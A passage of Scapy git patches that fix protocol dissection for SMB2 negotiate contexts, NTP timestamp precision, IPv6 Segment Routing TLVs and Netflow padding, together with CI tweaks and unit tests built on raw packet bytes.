CodeQL analysis runs-on: ubuntu-latest - strategy: - fail-fast: false - matrix: - language: ['python'] steps: - name: Checkout repository uses: actions/checkout@v2 with: fetch-depth: 2 - - run: git checkout HEAD^2 - if: ${{ github.event_name == 'pull_request' }} - name: Initialize CodeQL uses: github/codeql-action/init@v1 with: - languages: ${{ matrix.language }} + languages: 'python' - name: Perform CodeQL Analysis uses: github/codeql-action/analyze@v1 diff --git a/.gitignore b/.gitignore index b8685028c74..3f4c6767df0 100644 --- a/.gitignore +++ b/.gitignore @@ -9,5 +9,6 @@ test/*.html .tox .ipynb_checkpoints .mypy_cache +.vscode doc/scapy/_build doc/scapy/api diff --git a/.travis.yml b/.travis.yml index 911d7a270fd..e47173a1b5b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -14,12 +14,6 @@ jobs: env: - TOXENV=py38-isotp_kernel_module,codecov - # libpcap - - os: linux - python: 3.8 - env: - - SCAPY_USE_LIBPCAP=yes TOXENV=py38-linux_root,codecov - # warnings/deprecations - os: linux python: 3.8 diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 84abe9af8e7..ab8203061ef 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -373,7 +373,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monito if promisc is None: promisc = conf.sniff_promisc self.promisc = promisc - self.ins = open_pcap(iface, MTU, self.promisc, 0, + self.ins = open_pcap(iface, MTU, self.promisc, 100, monitor=monitor) try: ioctl(self.ins.fileno(), BIOCIMMEDIATE, struct.pack("I", 1)) @@ -403,7 +403,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilt if promisc is None: promisc = 0 self.promisc = promisc - self.ins = open_pcap(iface, MTU, self.promisc, 0, + self.ins = open_pcap(iface, MTU, self.promisc, 100, monitor=monitor) self.outs = self.ins try: diff --git a/test/linux.uts b/test/linux.uts index 10d49484dcf..b75d85c321c 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -319,7 +319,7 @@ assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" exit_status = os.system("ip link del name dev scapy0") = Test 802.Q sniffing -~ linux needs_root python3_only +~ linux needs_root python3_only veth from threading import Thread, Condition From e9301f6719b618fb2fc7b670f6190282886c425f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ma=C3=ABlle=20Roubeau?= Date: Tue, 30 Mar 2021 14:50:23 +0200 Subject: [PATCH 0543/1632] Add failing case in SMB2 tests When dissecting SMB2 Negociate Procotol Request Header containing 1 dialect --- test/scapy/layers/smb2.uts | 71 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 051fad6e05c..f4676fe63ea 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -204,3 +204,74 @@ assert comp.CompressionAlgorithms[0] == 1 pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Response_Header() pkt = IP(raw(pkt)) assert SMB2_Negociate_Protocol_Response_Header in pkt + ++ SMB2 Negociate Procotol Request Header with 1 dialect + += Common fields in header + +# OK test +rawpkt = b'\x45\x00\x01\x10\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xe4\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x01\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x68\x00\x00\x00\x04\x00\x00\x00\x11\x03\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 228 +assert SMB2_Header in pkt +assert SMB2_Negociate_Protocol_Request_Header in pkt +nego_req = pkt[SMB2_Negociate_Protocol_Request_Header] +# Check field values +assert nego_req.StructureSize == 0x24 +assert nego_req.DialectCount == 1 +assert nego_req.SecurityMode == 0 +assert nego_req.Capabilities == 0x7f000000 +assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' +assert nego_req.NegociateContextOffset == 0x68 +assert nego_req.NegociateCount == 4 +for dialect in nego_req.Dialects: + assert dialect in SMB_DIALECTS.keys() + +# Check SMB 3.1.1 +assert 0x311 in nego_req.Dialects +assert len(nego_req.NegociateContexts) == nego_req.NegociateCount + += SMB2 Negociate Context in Request - type PREAUTH - disassemble + +preauth = nego_req.NegociateContexts[0] +assert preauth.ContextType == 0x1 +assert preauth.DataLength == 38 +assert preauth.HashAlgorithmCount == 1 +assert preauth.SaltLength == 32 +assert preauth.Salt == b'\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18' +assert len(preauth.HashAlgorithms) == 1 +assert preauth.HashAlgorithms[0] == 0x1 + += SMB2 Negociate Context in Request - type ENCRYPTION disassemble + +enc = nego_req.NegociateContexts[1] +assert enc.ContextType == 0x2 +assert enc.DataLength == 6 +assert enc.CipherCount == 2 +assert len(enc.Ciphers) == 2 +assert enc.Ciphers[0] == 1 +assert enc.Ciphers[1] == 2 + + += SMB2 Negociate Context in Request - type COMPRESSION + +comp = nego_req.NegociateContexts[2] +assert comp.ContextType == 0x3 +assert comp.DataLength == 16 +assert comp.CompressionAlgorithmCount == 4 +assert len(comp.CompressionAlgorithms) == 4 +assert comp.CompressionAlgorithms[0] == 1 +assert comp.CompressionAlgorithms[1] == 2 +assert comp.CompressionAlgorithms[2] == 3 +assert comp.CompressionAlgorithms[3] == 4 + + += SMB2 Negociate Context in Request - type NETNAME NEGOCIATE + +netname = nego_req.NegociateContexts[3] +assert netname.ContextType == 0x5 +assert netname.DataLength == 28 +assert netname.NetName == '192.168.178.21' From b5b6e641b9304970d9d00fa7ea11d6e17e941005 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ma=C3=ABlle=20Roubeau?= Date: Tue, 30 Mar 2021 16:21:24 +0200 Subject: [PATCH 0544/1632] Use a ReversePadField for NegociateContexts in SMB2 Negotiate Request And not a PadField for Dialects anymore --- scapy/layers/smb2.py | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index d8308b53721..eadbf975580 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -20,7 +20,7 @@ LEShortEnumField, LEShortField, PacketListField, - PadField, + ReversePadField, ShortEnumField, ShortField, StrFieldUtf16, @@ -154,20 +154,17 @@ class SMB2_Negociate_Protocol_Request_Header(Packet): count_of="NegociateContexts" ), ShortField("Reserved2", 0), - # Padding the dialects - the whole packet (from the - # beginning) should be aligned on 8 bytes ; so the list of - # dialects should be aligned on 6 bytes (because it starts - # at PKT + 8 * N + 2 - PadField(FieldListField( + FieldListField( "Dialects", [0x0202], LEShortEnumField("", 0x0, SMB_DIALECTS), count_from=lambda pkt: pkt.DialectCount - ), 6), - PacketListField( + ), + # The first negotiate context must be 8-byte aligned + ReversePadField(PacketListField( "NegociateContexts", [], SMB2_Negociate_Context, count_from=lambda pkt: pkt.NegociateCount - ), + ), 8), ] From a9f8d0244d04a87ddee0e5c354aa6e28983ed44a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ma=C3=ABlle=20Roubeau?= Date: Fri, 2 Apr 2021 15:21:42 +0200 Subject: [PATCH 0545/1632] Set SMB2 Negociate Request Header default DialectCount value to None And add corresponding test case --- scapy/layers/smb2.py | 2 +- test/scapy/layers/smb2.uts | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index eadbf975580..88461054b09 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -134,7 +134,7 @@ class SMB2_Negociate_Protocol_Request_Header(Packet): fields_desc = [ XLEShortField("StructureSize", 0), FieldLenField( - "DialectCount", 0, + "DialectCount", None, fmt=" Date: Wed, 31 Mar 2021 19:58:45 +0200 Subject: [PATCH 0546/1632] Fix NTP timestamp precision --- scapy/fields.py | 13 ++++++++----- scapy/layers/ntp.py | 5 ++++- scapy/utils.py | 9 ++++++++- test/scapy/layers/ntp.uts | 4 ++++ 4 files changed, 24 insertions(+), 7 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 7448400c871..9ce93628e81 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -14,6 +14,7 @@ import collections import copy import inspect +import math import socket import struct import time @@ -32,7 +33,7 @@ from scapy.error import log_runtime, Scapy_Exception from scapy.compat import bytes_hex, chb, orb, plain_str, raw, bytes_encode from scapy.pton_ntop import inet_ntop, inet_pton -from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac +from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac, EDecimal from scapy.utils6 import in6_6to4ExtractAddr, in6_isaddr6to4, \ in6_isaddrTeredo, in6_ptop, Net6, teredoAddrExtractInfo from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass @@ -3038,11 +3039,13 @@ def any2i(self, pkt, val): return (ival << self.frac_bits) | fract def i2h(self, pkt, val): - # type: (Optional[Packet], int) -> float + # type: (Optional[Packet], int) -> EDecimal + # A bit of trickery to get precise floats int_part = val >> self.frac_bits - frac_part = float(val & (1 << self.frac_bits) - 1) - frac_part /= 2.0**self.frac_bits - return int_part + frac_part + pw = 2.0**self.frac_bits + frac_part = EDecimal(val & (1 << self.frac_bits) - 1) + frac_part /= pw # type: ignore + return int_part + frac_part.normalize(int(math.log10(pw))) def i2repr(self, pkt, val): # type: (Optional[Packet], int) -> str diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 21da95c88ef..cf80ef2b16e 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -80,7 +80,10 @@ def i2repr(self, pkt, val): val = self.i2h(pkt, val) if val < _NTP_BASETIME: return val - return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val - _NTP_BASETIME)) # noqa: E501 + return time.strftime( + "%a, %d %b %Y %H:%M:%S +0000", + time.gmtime(int(val - _NTP_BASETIME)) + ) def any2i(self, pkt, val): if isinstance(val, six.string_types): diff --git a/scapy/utils.py b/scapy/utils.py index 12747fa6a68..ef8b80a5311 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -14,6 +14,7 @@ import array import collections +import decimal import difflib import gzip import os @@ -24,8 +25,8 @@ import subprocess import sys import tempfile -import time import threading +import time import warnings import scapy.modules.six as six @@ -162,6 +163,12 @@ def __eq__(self, other): # type: (Any) -> bool return super(EDecimal, self).__eq__(other) or float(self) == other + def normalize(self, precision): # type: ignore + # type: (int) -> EDecimal + with decimal.localcontext() as ctx: + ctx.prec = precision + return EDecimal(super(EDecimal, self).normalize(ctx)) + @overload def get_temp_file(keep, autoext, fd): diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 6d9d3ffd91a..a14198c02ce 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -70,6 +70,10 @@ assert(isinstance(p, NTPHeader)) assert(p[NTPAuthenticator].key_id == 1) assert(bytes_hex(p[NTPAuthenticator].dgst) == b'ad79f3a1e5fcd032d26a1e27c3c1b60e') += NTPHeader - High precision +pkt = NTP(b'#\x02\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xe3\xaaz\xf7\xb4\x07\xaa\xea\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f+\xe2X>\xb8\x00') +assert NTP(raw(NTP(orig=pkt.orig))).orig == pkt.orig +assert str(pkt.orig) == '3819600631.703241999' = NTPHeader - KoD s = b'\xe4\x00\x06\xe8\x00\x00\x00\x00\x00\x00\x02\xcaINIT\x00\x00\x00\x00\x00\x00\x00\x00\xdb@\xe3\x9eH\xa3pj\xdb@\xe3\x9eH\xf0\xc3\\\xdb@\xe3\x9eH\xfaL\xac\x00\x00\x00\x01B\x86)\xc1Q4\x8bW8\xe7Q\xda\xd0Z\xbc\xb8' From 33a6a5c3db28cb3c6e64880cef18c672e9526260 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 28 Mar 2021 01:10:08 +0100 Subject: [PATCH 0547/1632] Update IPv6ExtHdrSegmentRoutingTLV --- scapy/layers/inet6.py | 61 +++++++++++++++++++++++++++++-------- test/scapy/layers/inet6.uts | 6 ++-- 2 files changed, 51 insertions(+), 16 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index f5c9bd33d49..03f931691b8 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -897,15 +897,24 @@ def post_build(self, pkt, pay): # Segment Routing Header # -# This implementation is based on draft 06, available at: +# This implementation is based on RFC8754, but some older snippets come from: # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 +_segment_routing_header_tlvs = { + # RFC 8754 sect 8.2 + 0: "Pad1 TLV", + 1: "Ingress Node TLV", # draft 06 + 2: "Egress Node TLV", # draft 06 + 4: "PadN TLV", + 5: "HMAC TLV", +} + + class IPv6ExtHdrSegmentRoutingTLV(Packet): name = "IPv6 Option Header Segment Routing - Generic TLV" - fields_desc = [ByteField("type", 0), + # RFC 8754 sect 2.1 + fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), ByteField("len", 0), - ByteField("reserved", 0), - ByteField("flags", 0), StrLenField("value", "", length_from=lambda pkt: pkt.len)] def extract_padding(self, p): @@ -920,14 +929,15 @@ def register_variant(cls): @classmethod def dispatch_hook(cls, pkt=None, *args, **kargs): if pkt: - tmp_type = orb(pkt[0]) + tmp_type = ord(pkt[:1]) return cls.registered_sr_tlv.get(tmp_type, cls) return cls class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Ingress Node TLV" - fields_desc = [ByteField("type", 1), + # draft-ietf-6man-segment-routing-header-06 3.1.1 + fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), @@ -936,22 +946,46 @@ class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Egress Node TLV" - fields_desc = [ByteField("type", 2), + # draft-ietf-6man-segment-routing-header-06 3.1.2 + fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("egress_node", "::1")] -class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): - name = "IPv6 Option Header Segment Routing - Padding TLV" - fields_desc = [ByteField("type", 4), +class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): + name = "IPv6 Option Header Segment Routing - Pad1 TLV" + # RFC8754 sect 2.1.1.1 + fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), FieldLenField("len", None, length_of="padding", fmt="B"), StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 +class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): + name = "IPv6 Option Header Segment Routing - PadN TLV" + # RFC8754 sect 2.1.1.2 + fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), + FieldLenField("len", None, length_of="padding", fmt="B"), + StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 + + +class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): + name = "IPv6 Option Header Segment Routing - HMAC TLV" + # RFC8754 sect 2.1.2 + fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), + FieldLenField("len", None, length_of="hmac", + adjust=lambda _, x: x + 48), + BitField("D", 0, 1), + BitField("reserved", 0, 15), + IntField("hmackeyid", 0), + StrLenField("hmac", "", + length_from=lambda pkt: pkt.len - 48)] + + class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): name = "IPv6 Option Header Segment Routing" + # RFC8754 sect 2. + flag bits from draft 06 fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteField("type", 4), @@ -979,13 +1013,14 @@ def post_build(self, pkt, pay): if self.len is None: # The extension must be align on 8 bytes - tmp_mod = (len(pkt) - 8) % 8 + tmp_mod = (-len(pkt) + 8) % 8 if tmp_mod == 1: - warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte!") + tlv = IPv6ExtHdrSegmentRoutingTLVPad1() + pkt += raw(tlv) elif tmp_mod >= 2: # Add the padding extension tmp_pad = b"\x00" * (tmp_mod - 2) - tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) + tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) pkt += raw(tlv) tmp_len = (len(pkt) - 8) // 8 diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index f931545ff3b..6483a5f2f0c 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -89,14 +89,14 @@ assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2 and len(p[IPv6ExtHdrSegmentRou = IPv6ExtHdrSegmentRouting Class - TLVs list - build & dissect -s = raw(IPv6()/IPv6ExtHdrSegmentRouting(tlv_objects=[IPv6ExtHdrSegmentRoutingTLV()])/TCP()) -assert(s == b'`\x00\x00\x00\x004+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x04\x02\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00') +s = raw(IPv6()/IPv6ExtHdrSegmentRouting(tlv_objects=[IPv6ExtHdrSegmentRoutingTLVHMAC()])/TCP()) +assert s == b'`\x00\x00\x00\x00<+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x000\x00\x00\x00\x00\x00\x00\x04\x05\x00\x00\x00\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' p = IPv6(s) assert(TCP in p and IPv6ExtHdrSegmentRouting in p) assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0) assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) -assert(isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadding)) +assert(isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadN)) = IPv6ExtHdrSegmentRouting Class - both lists - build & dissect From 37afb3f2d613c9170fb34b22e1369353aedee78d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ma=C3=ABlle=20Roubeau?= Date: Wed, 7 Apr 2021 13:30:55 +0200 Subject: [PATCH 0548/1632] Use ReversePadFields for each element of NegociateContexts NegociateContexts becomes ConditionalField depending on dialect value --- scapy/layers/smb2.py | 53 +++++++++++--------------- test/scapy/layers/smb2.uts | 78 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 101 insertions(+), 30 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 88461054b09..03dcf91a307 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -10,6 +10,7 @@ from scapy.config import conf from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( + ConditionalField, FieldLenField, FieldListField, FlagsField, @@ -19,7 +20,7 @@ LELongField, LEShortEnumField, LEShortField, - PacketListField, + PacketField, ReversePadField, ShortEnumField, ShortField, @@ -149,7 +150,7 @@ class SMB2_Negociate_Protocol_Request_Header(Packet): UUIDField("ClientGUID", 0x0, uuid_fmt=UUIDField.FORMAT_LE), XLEIntField("NegociateContextOffset", 0x0), FieldLenField( - "NegociateCount", 0x0, + "NegociateCount", None, fmt=" Date: Sun, 28 Mar 2021 01:46:12 +0100 Subject: [PATCH 0549/1632] Improve Netflow padding detection --- scapy/layers/netflow.py | 150 ++++++++++++++++++++-------------- test/scapy/layers/netflow.uts | 14 ++++ 2 files changed, 103 insertions(+), 61 deletions(-) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index be69f4f20d6..8343b1c4e03 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -35,12 +35,31 @@ from scapy.config import conf from scapy.data import IP_PROTOS from scapy.error import warning, Scapy_Exception -from scapy.fields import ByteEnumField, ByteField, Field, FieldLenField, \ - FlagsField, IPField, IntField, MACField, \ - PacketListField, PadField, SecondsIntField, ShortEnumField, ShortField, \ - StrField, StrFixedLenField, ThreeBytesField, UTCTimeField, XByteField, \ - XShortField, LongField, BitField, ConditionalField, BitEnumField, \ - StrLenField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + Field, + FieldLenField, + FlagsField, + IPField, + IntField, + LongField, + MACField, + PacketListField, + SecondsIntField, + ShortEnumField, + ShortField, + StrField, + StrFixedLenField, + StrLenField, + ThreeBytesField, + UTCTimeField, + XByteField, + XShortField, +) from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.plist import PacketList from scapy.sessions import IPSession, DefaultSession @@ -1388,14 +1407,11 @@ def default_payload_class(self, p): class NetflowDataflowsetV9(Packet): name = "Netflow DataFlowSet V9/10" fields_desc = [ShortField("templateID", 255), - FieldLenField("length", None, length_of="records", - adjust=lambda pkt, x: x + 4 + (-x % 4)), - PadField( - PacketListField( - "records", [], - NetflowRecordV9, - length_from=lambda pkt: pkt.length - 4 - ), 4, padwith=b"\x00")] + ShortField("length", None), + PacketListField( + "records", [], + NetflowRecordV9, + length_from=lambda pkt: pkt.length - 4)] @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): @@ -1413,6 +1429,15 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return NetflowOptionsFlowset10 return cls + def post_build(self, pkt, pay): + if self.length is None: + # Padding is optional, let's apply it on build + length = len(pkt) + pad = (-length) % 4 + pkt = pkt[:2] + struct.pack("!H", length + pad) + pkt[4:] + pkt += b"\x00" * pad + return pkt + pay + def _netflowv9_defragment_packet(pkt, definitions, definitions_opts, ignored): """Used internally to process a single packet during defragmenting""" @@ -1467,53 +1492,56 @@ def _netflowv9_defragment_packet(pkt, definitions, definitions_opts, ignored): current = current.payload # Dissect flowsets if NetflowDataflowsetV9 in pkt: - datafl = pkt[NetflowDataflowsetV9] - tid = datafl.templateID - if tid not in definitions and tid not in definitions_opts: - ignored.add(tid) - return - # All data is stored in one record, awaiting to be split - # If fieldValue is available, the record has not been - # defragmented: pop it - try: - data = datafl.records[0].fieldValue - datafl.records.pop(0) - except (IndexError, AttributeError): - return - res = [] - # Flowset record - # Now, according to the flow/option data, - # let's re-dissect NetflowDataflowsetV9 - if tid in definitions: - tot_len, cls = definitions[tid] - while len(data) >= tot_len: - res.append(cls(data[:tot_len])) - data = data[tot_len:] - # Inject dissected data - datafl.records = res - if data: - if len(data) <= 4: - datafl.add_payload(conf.padding_layer(data)) - else: - datafl.do_dissect_payload(data) - # Options - elif tid in definitions_opts: - (scope_len, scope_cls, - option_len, option_cls) = definitions_opts[tid] - # Dissect scopes - if scope_len: - res.append(scope_cls(data[:scope_len])) - if option_len: - res.append( - option_cls(data[scope_len:scope_len + option_len]) - ) - if len(data) > scope_len + option_len: - res.append( - conf.padding_layer(data[scope_len + option_len:]) - ) - # Inject dissected data - datafl.records = res - datafl.name = "Netflow DataFlowSet V9/10 - OPTIONS" + current = pkt + while NetflowDataflowsetV9 in current: + datafl = current[NetflowDataflowsetV9] + tid = datafl.templateID + if tid not in definitions and tid not in definitions_opts: + ignored.add(tid) + return + # All data is stored in one record, awaiting to be split + # If fieldValue is available, the record has not been + # defragmented: pop it + try: + data = datafl.records[0].fieldValue + datafl.records.pop(0) + except (IndexError, AttributeError): + return + res = [] + # Flowset record + # Now, according to the flow/option data, + # let's re-dissect NetflowDataflowsetV9 + if tid in definitions: + tot_len, cls = definitions[tid] + while len(data) >= tot_len: + res.append(cls(data[:tot_len])) + data = data[tot_len:] + # Inject dissected data + datafl.records = res + if data: + if len(data) <= 4: + datafl.add_payload(conf.padding_layer(data)) + else: + datafl.do_dissect_payload(data) + # Options + elif tid in definitions_opts: + (scope_len, scope_cls, + option_len, option_cls) = definitions_opts[tid] + # Dissect scopes + if scope_len: + res.append(scope_cls(data[:scope_len])) + if option_len: + res.append( + option_cls(data[scope_len:scope_len + option_len]) + ) + if len(data) > scope_len + option_len: + res.append( + conf.padding_layer(data[scope_len + option_len:]) + ) + # Inject dissected data + datafl.records = res + datafl.name = "Netflow DataFlowSet V9/10 - OPTIONS" + current = datafl.payload def netflowv9_defragment(plist, verb=1): diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index 61f913c80f9..3d7d0b25ed3 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -201,6 +201,20 @@ pkt4 = NetflowTemplateV9(s) assert len(pkt4.template_fields) == pkt4.fieldCount assert sum([template.fieldLength for template in pkt4.template_fields]) == 124 += NetflowV10/IPFIX - dissection without padding (GH3101) + +s=b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00f\x00\x01\x00\x00@\x11|\x84\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x07\x08\x07\x00R\xee\xa2\x00\n\x00H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x01\x01\x00\x04\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x01\x00\x11\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x01\x01\x00\x11\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b' +pkt = netflowv9_defragment(Ether(s))[0] + +for i in range(1,3): + assert pkt.getlayer(NetflowDataflowsetV9, i).templateID == 257 + assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IN_PKTS == b'\x00\x00\x00\x00' + assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].PROTOCOL == 6 + assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IPV4_SRC_ADDR == "192.168.0.10" + assert pkt.getlayer(NetflowDataflowsetV9, i).records[0].IPV4_DST_ADDR == "192.168.0.11" + +assert not pkt.getlayer(NetflowDataflowsetV9, 2).payload + = NetflowV10/IPFIX - build netflow_header = NetflowHeader()/NetflowHeaderV10() From ecf2facfcbba564cf489abe63bf35c652e6fdc0d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 21 Feb 2021 19:17:13 +0100 Subject: [PATCH 0550/1632] Improve BPF validation with tcpdump --- .gitignore | 1 + scapy/utils.py | 25 +++++++++++++------------ test/regression.uts | 8 ++++++++ 3 files changed, 22 insertions(+), 12 deletions(-) diff --git a/.gitignore b/.gitignore index 3f4c6767df0..5d2ab2f390f 100644 --- a/.gitignore +++ b/.gitignore @@ -6,6 +6,7 @@ MANIFEST *.egg-info/ scapy/VERSION test/*.html +.coverage* .tox .ipynb_checkpoints .mypy_cache diff --git a/scapy/utils.py b/scapy/utils.py index ef8b80a5311..2e5efbbf964 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1974,20 +1974,19 